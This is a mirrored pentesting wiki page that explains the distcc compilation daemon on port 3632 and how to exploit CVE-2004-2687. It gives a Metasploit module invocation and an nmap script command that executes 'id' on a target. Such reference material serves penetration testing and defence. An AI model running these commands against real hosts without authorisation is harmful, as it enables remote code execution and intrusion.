mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
40 lines
1.2 KiB
Markdown
40 lines
1.2 KiB
Markdown
# 3632 - Pentesting Distcc
|
|
|
|
{{#include ../banners/hacktricks-training.md}}
|
|
|
|
## Basic Information
|
|
|
|
**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code.
|
|
|
|
**Default port:** 3632
|
|
|
|
```
|
|
PORT STATE SERVICE
|
|
3632/tcp open distccd
|
|
```
|
|
|
|
## Exploitation
|
|
|
|
Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
|
|
|
|
```bash
|
|
msf5 > use exploit/unix/misc/distcc_exec
|
|
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
|
|
```
|
|
|
|
## Shodan
|
|
|
|
_I don't think shodan detects this service._
|
|
|
|
## Resources
|
|
|
|
- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
|
|
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
|
|
|
|
Post created by **Álex B (@r1p)**
|
|
|
|
{{#include ../banners/hacktricks-training.md}}
|
|
|
|
|
|
|